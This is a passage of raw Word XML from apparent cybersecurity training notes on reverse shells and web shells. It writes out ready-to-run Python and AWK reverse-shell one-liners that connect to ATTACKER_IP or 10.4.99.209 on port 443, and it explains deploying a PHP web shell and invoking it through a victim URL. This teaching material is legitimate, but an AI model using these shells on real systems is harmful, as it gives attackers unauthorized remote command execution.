    <w:p w14:paraId="71E111D0" w14:textId="0F5CFF92" w:rsidR="00D31048" w:rsidRDefault="00D31048" w:rsidP="001E37BD">
      <w:r w:rsidRPr="00D31048">
        <w:t>The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D31048">
        <w:t>passthru</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D31048">
        <w:t> function executes a command and sends raw output back to the browser. This is useful when working with binary data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3AF5DF" w14:textId="0EB7B2BD" w:rsidR="00FB7999" w:rsidRDefault="00FB7999" w:rsidP="00FB7999">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB7999">
        <w:t xml:space="preserve">PHP Reverse Shell Using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FB7999">
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FB7999">
        <w:t xml:space="preserve"> Function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539D79D7" w14:textId="1026A6AC" w:rsidR="00FB7999" w:rsidRDefault="00343E0E" w:rsidP="00FB7999">
      <w:r w:rsidRPr="00343E0E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35D4C710" wp14:editId="709A98DE">
            <wp:extent cx="5731510" cy="532765"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="179838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89790" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="532765"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5D6395" w14:textId="06B464C4" w:rsidR="00343E0E" w:rsidRDefault="00343E0E" w:rsidP="00FB7999">
      <w:r w:rsidRPr="00343E0E">
        <w:t>This reverse shell uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00343E0E">
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00343E0E">
        <w:t> to open a process file pointer, allowing the shell to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECFF0D" w14:textId="77777777" w:rsidR="001F7DAB" w:rsidRPr="001F7DAB" w:rsidRDefault="001F7DAB" w:rsidP="001F7DAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7DAB">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46018045" w14:textId="77777777" w:rsidR="001F7DAB" w:rsidRPr="001F7DAB" w:rsidRDefault="001F7DAB" w:rsidP="001F7DAB">
      <w:r w:rsidRPr="001F7DAB">
        <w:t>﻿Please note, the following snippets below require using python -c to run, indicated by the placeholder PY-C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A2BC25" w14:textId="77777777" w:rsidR="001F7DAB" w:rsidRDefault="001F7DAB" w:rsidP="001F7DAB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="001F7DAB">
        <w:t>Python Reverse Shell by Exporting Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6E5E1" w14:textId="261F0ED1" w:rsidR="00F64EB5" w:rsidRPr="00F64EB5" w:rsidRDefault="00AB266D" w:rsidP="00F64EB5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="10883687" wp14:editId="462CED68">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6118860" cy="731520"/>
                <wp:effectExtent l="0" t="0" r="15240" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="457777112" name="Text Box 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6118860" cy="73152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0A49AA5E" w14:textId="1EDB9B1F" w:rsidR="00AB266D" w:rsidRDefault="00AB266D">
                            <w:r w:rsidRPr="00AB266D">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">target@tryhackme:~$ </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00AB266D">
                              <w:t>export RHOST="ATTACKER_IP"; export RPORT=443; PY-C 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'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83687" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 1" o:spid="_x0000_s1026" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:.85pt;width:481.8pt;height:5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" fillcolor="#d9e2f3 [660]" strokecolor="#4472c4 [3204]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0A49AA5E" w14:textId="1EDB9B1F" w:rsidR="00AB266D" w:rsidRDefault="00AB266D">
                      <w:r w:rsidRPr="00AB266D">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">target@tryhackme:~$ </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00AB266D">
                        <w:t>export RHOST="ATTACKER_IP"; export RPORT=443; PY-C 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="714D1AC2" w14:textId="77777777" w:rsidR="001F7DAB" w:rsidRPr="00FB7999" w:rsidRDefault="001F7DAB" w:rsidP="00FB7999"/>
    <w:p w14:paraId="6472A405" w14:textId="77777777" w:rsidR="007C3B8A" w:rsidRPr="007C3B8A" w:rsidRDefault="007C3B8A" w:rsidP="007C3B8A"/>
    <w:p w14:paraId="653EACD7" w14:textId="107C296E" w:rsidR="00E20536" w:rsidRDefault="00F7719F" w:rsidP="00CD5232">
      <w:r w:rsidRPr="00F7719F">
        <w:t>This reverse shell sets the remote host and port as environment variables, creates a socket connection, and duplicates the socket file descriptor for standard input/output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D620E" w14:textId="07C6E5F7" w:rsidR="00B77E4A" w:rsidRDefault="00B77E4A" w:rsidP="00DD1D30">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00B77E4A">
        <w:t>Python Reverse Shell Using the subprocess Module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A758C33" w14:textId="14C3DA0B" w:rsidR="00DD1D30" w:rsidRDefault="00384F07" w:rsidP="00DD1D30">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="389086FA" wp14:editId="1B96FA64">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6118860" cy="731520"/>
                <wp:effectExtent l="0" t="0" r="15240" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="2036745257" name="Text Box 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6118860" cy="73152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6373AFBA" w14:textId="634ADD93" w:rsidR="00384F07" w:rsidRPr="00FC5218" w:rsidRDefault="00384F07" w:rsidP="00384F07">
                            <w:r w:rsidRPr="00384F07">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">target@tryhackme:~$ </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00FC5218">
                              <w:t>PY-C 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.4.99.209",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'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086FA" id="_x0000_s1027" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:481.8pt;height:5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" fillcolor="#d9e2f3 [660]" strokecolor="#4472c4 [3204]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6373AFBA" w14:textId="634ADD93" w:rsidR="00384F07" w:rsidRPr="00FC5218" w:rsidRDefault="00384F07" w:rsidP="00384F07">
                      <w:r w:rsidRPr="00384F07">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">target@tryhackme:~$ </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00FC5218">
                        <w:t>PY-C 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.4.99.209",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA9D88F" w14:textId="77777777" w:rsidR="00FA1D34" w:rsidRPr="00FA1D34" w:rsidRDefault="00FA1D34" w:rsidP="00FA1D34"/>
    <w:p w14:paraId="7437D756" w14:textId="77777777" w:rsidR="00FA1D34" w:rsidRDefault="00FA1D34" w:rsidP="00FA1D34"/>
    <w:p w14:paraId="2C405EF4" w14:textId="27CC8C1E" w:rsidR="00FA1D34" w:rsidRDefault="008D2A28" w:rsidP="00FA1D34">
      <w:r w:rsidRPr="008D2A28">
        <w:t>This reverse shell uses the subprocess module to spawn a shell and set up a similar environment as the Python Reverse Shell by Exporting Environment Variables command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527A29CE" w14:textId="69CFBB62" w:rsidR="0057070E" w:rsidRDefault="0057070E" w:rsidP="002431AC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="0057070E">
        <w:t>Short Python Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F519641" w14:textId="7CF70B69" w:rsidR="00F62FC1" w:rsidRDefault="00DB3A69" w:rsidP="00F62FC1">
      <w:r w:rsidRPr="00DB3A69">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C7DC610" wp14:editId="2DC3A48A">
            <wp:extent cx="5731510" cy="426720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="86363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33458" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="426720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="066B4DB2" w14:textId="4C4DCAE2" w:rsidR="002C4E9D" w:rsidRDefault="002C4E9D" w:rsidP="00F62FC1">
      <w:r w:rsidRPr="002C4E9D">
        <w:t>This reverse shell creates a socket (s), connects to the attacker, and redirects standard input, output, and error to the socket using os.dup2().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DE1255" w14:textId="40945BBF" w:rsidR="00E5513D" w:rsidRDefault="00E5513D" w:rsidP="0079052B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00E5513D">
        <w:lastRenderedPageBreak/>
        <w:t>Others</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772316ED" w14:textId="2BB09E1E" w:rsidR="00E2574E" w:rsidRDefault="00E2574E" w:rsidP="00996B78">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00E2574E">
        <w:t>Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C2538E" w14:textId="21A6BABE" w:rsidR="006335D4" w:rsidRDefault="006335D4" w:rsidP="006335D4">
      <w:r w:rsidRPr="006335D4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1456C6D2" wp14:editId="44E75445">
            <wp:extent cx="5731510" cy="460375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="182292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4896" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="460375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F64ED" w14:textId="421A5C7D" w:rsidR="00D201FB" w:rsidRDefault="00D201FB" w:rsidP="006335D4">
      <w:r w:rsidRPr="00D201FB">
        <w:t>This reverse shell creates a named pipe using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D201FB">
        <w:t>mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D201FB">
        <w:t> and connects to the attacker via Telnet on IP ATTACKER_IP and port 443. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B9343" w14:textId="737458EF" w:rsidR="00BE6BF6" w:rsidRDefault="00BE6BF6" w:rsidP="00BE6BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE6BF6">
        <w:t>AWK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D856E64" w14:textId="3568B0FF" w:rsidR="00D81862" w:rsidRDefault="00D81862" w:rsidP="00D81862">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C5B0773" wp14:editId="1B396DF8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6118860" cy="731520"/>
                <wp:effectExtent l="0" t="0" r="15240" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="1796169101" name="Text Box 1"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="6118860" cy="73152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22E8B132" w14:textId="542A41C4" w:rsidR="00D81862" w:rsidRPr="00CD0E52" w:rsidRDefault="00CD0E52" w:rsidP="00D81862">
                            <w:r w:rsidRPr="00CD0E52">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">target@tryhackme:~$ </w:t>
                            </w:r>
                            <w:r w:rsidRPr="00CD0E52">
                              <w:t>awk 'BEGIN {s = "/inet/tcp/0/ATTACKER_IP/443"; while(42) { do{ printf "shell&gt;" |&amp; s; s |&amp; getline c; if(c){ while ((c |&amp; getline) &gt; 0) print $0 |&amp; s; close(c); } } while(c != "exit") close(s); }}' /dev/null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B0773" id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:0;width:481.8pt;height:5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" fillcolor="#d9e2f3 [660]" strokecolor="#4472c4 [3204]" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="22E8B132" w14:textId="542A41C4" w:rsidR="00D81862" w:rsidRPr="00CD0E52" w:rsidRDefault="00CD0E52" w:rsidP="00D81862">
                      <w:r w:rsidRPr="00CD0E52">
                        <w:rPr>
                          <w:b/>
                          <w:bCs/>
                        </w:rPr>
                        <w:t xml:space="preserve">target@tryhackme:~$ </w:t>
                      </w:r>
                      <w:r w:rsidRPr="00CD0E52">
                        <w:t>awk 'BEGIN {s = "/inet/tcp/0/ATTACKER_IP/443"; while(42) { do{ printf "shell&gt;" |&amp; s; s |&amp; getline c; if(c){ while ((c |&amp; getline) &gt; 0) print $0 |&amp; s; close(c); } } while(c != "exit") close(s); }}' /dev/null</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="607E496B" w14:textId="77777777" w:rsidR="00386B19" w:rsidRPr="00386B19" w:rsidRDefault="00386B19" w:rsidP="00386B19"/>
    <w:p w14:paraId="3504D9DE" w14:textId="77777777" w:rsidR="00386B19" w:rsidRDefault="00386B19" w:rsidP="00386B19"/>
    <w:p w14:paraId="00CDCB41" w14:textId="77777777" w:rsidR="00386B19" w:rsidRPr="00386B19" w:rsidRDefault="00386B19" w:rsidP="00386B19">
      <w:r w:rsidRPr="00386B19">
        <w:t>This reverse shell uses AWK’s built-in TCP capabilities to connect to ATTACKER_IP:443. It reads commands from the attacker and executes them. Then it sends the results back over the same TCP connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB3CF9" w14:textId="77777777" w:rsidR="00386B19" w:rsidRDefault="00386B19" w:rsidP="00A1735E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00386B19">
        <w:t>BusyBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75722EDF" w14:textId="31687695" w:rsidR="00166FD7" w:rsidRDefault="00F65644" w:rsidP="00166FD7">
      <w:r w:rsidRPr="00F65644">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F99FC29" wp14:editId="5E0A0456">
            <wp:extent cx="5731510" cy="588010"/>
            <wp:effectExtent l="0" t="0" r="2540" b="2540"/>
            <wp:docPr id="154730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08299" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="588010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="563AA96F" w14:textId="618D3177" w:rsidR="00FE0A46" w:rsidRDefault="00FE0A46" w:rsidP="00166FD7">
      <w:r w:rsidRPr="00FE0A46">
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE0A46">
        <w:t>BusyBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE0A46">
        <w:t xml:space="preserve"> reverse shell uses </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE0A46">
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE0A46">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE0A46">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE0A46">
        <w:t>) to connect to the attacker at ATTACKER_IP:443. Once connected, it executes /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FE0A46">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FE0A46">
        <w:t>, exposing the command line to the attacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D7488" w14:textId="77777777" w:rsidR="009129EB" w:rsidRDefault="009129EB" w:rsidP="00166FD7"/>
    <w:p w14:paraId="7797A57C" w14:textId="553B5261" w:rsidR="009129EB" w:rsidRDefault="009129EB" w:rsidP="009129EB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="009129EB">
        <w:t>Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EC0ED6" w14:textId="77777777" w:rsidR="00442C2F" w:rsidRPr="00442C2F" w:rsidRDefault="00442C2F" w:rsidP="00442C2F">
      <w:r w:rsidRPr="00442C2F">
        <w:t>A web shell is a script written in a language supported by a compromised web server that executes commands through the web server itself. A web shell is usually a file containing the code that executes commands and handles files. It can be hidden within a compromised web application or service, making it difficult to detect and very popular among attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B020E52" w14:textId="77777777" w:rsidR="00442C2F" w:rsidRPr="00442C2F" w:rsidRDefault="00442C2F" w:rsidP="00442C2F">
      <w:r w:rsidRPr="00442C2F">
        <w:t>Web shells can be written in several languages supported by web servers, like PHP, ASP, JSP, and even simple CGI scripts. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1B7224" w14:textId="77777777" w:rsidR="00971B59" w:rsidRPr="00971B59" w:rsidRDefault="00971B59" w:rsidP="001974B2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00971B59">
        <w:t>Example PHP Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174B49FA" w14:textId="1152FE19" w:rsidR="009129EB" w:rsidRPr="009129EB" w:rsidRDefault="00971B59" w:rsidP="009129EB">
      <w:r w:rsidRPr="00971B59">
        <w:t>Let’s look at an example PHP web shell to understand how this process works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE81025" w14:textId="43240F0A" w:rsidR="00386B19" w:rsidRDefault="00F54B1F" w:rsidP="00386B19">
      <w:r w:rsidRPr="00F54B1F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5961C594" wp14:editId="1D8D1D22">
            <wp:extent cx="5731510" cy="1125855"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="73961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11757" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1125855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB20347" w14:textId="63A44FCD" w:rsidR="00892C8A" w:rsidRPr="00892C8A" w:rsidRDefault="00892C8A" w:rsidP="00892C8A">
      <w:r w:rsidRPr="00892C8A">
        <w:lastRenderedPageBreak/>
        <w:t>The above shell can be saved into a file with the PHP extension, like </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00892C8A">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00892C8A">
        <w:t>, and then uploaded into the web server by the attacker by exploiting vulnerabilities such as Unrestricted File Upload, File Inclusion, Command Injection, among others, or by gaining unauthorized access to it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57349ED2" w14:textId="77777777" w:rsidR="00892C8A" w:rsidRPr="00892C8A" w:rsidRDefault="00892C8A" w:rsidP="00892C8A">
      <w:r w:rsidRPr="00892C8A">
        <w:t>After the web shell is deployed in the server, it can be accessed through the URL where the web shell is hosted, in this example </w:t>
      </w:r>
      <w:r w:rsidRPr="00892C8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>http://victim.com/uploads/shell.php</w:t>
      </w:r>
      <w:r w:rsidRPr="00892C8A">
        <w:t>. As we observed from the code in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00892C8A">
        <w:t>shell.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00892C8A">
        <w:t>, we need to provide a GET method and the value of the variable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00892C8A">
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00892C8A">
        <w:t>, which should contain the command the attacker wants to execute. For example, if we want to execute the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00892C8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00892C8A">
        <w:t> the request to the URL should be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BDCAF0" w14:textId="77777777" w:rsidR="00892C8A" w:rsidRPr="00892C8A" w:rsidRDefault="00892C8A" w:rsidP="00892C8A">
      <w:r w:rsidRPr="00892C8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>http://victim.com/uploads/shell.php?cmd=whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441F1B33" w14:textId="77777777" w:rsidR="00892C8A" w:rsidRPr="00892C8A" w:rsidRDefault="00892C8A" w:rsidP="00892C8A">
      <w:r w:rsidRPr="00892C8A">
        <w:t>The above will execute the command </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00892C8A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00892C8A">
        <w:t> and display the result in the web browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB08737" w14:textId="77777777" w:rsidR="003F04E1" w:rsidRPr="003F04E1" w:rsidRDefault="003F04E1" w:rsidP="00B15547">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="003F04E1">
